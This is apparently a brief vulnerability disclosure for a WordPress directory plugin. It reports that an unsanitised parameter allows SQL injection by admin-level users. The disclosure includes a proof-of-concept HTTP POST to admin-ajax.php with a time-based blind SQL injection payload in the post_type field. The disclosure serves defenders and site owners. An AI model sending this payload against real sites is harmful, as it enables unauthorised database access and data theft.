The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
POST /wp-admin/admin-ajax.php HTTP/1.1 action=geodir_delete_dummy_data&security;=72951761a8&post;_type=gd_place_detail+WHERE+4508=4508+AND+(SELECT+2067+FROM+(SELECT(SLEEP(5)))nWvn)–+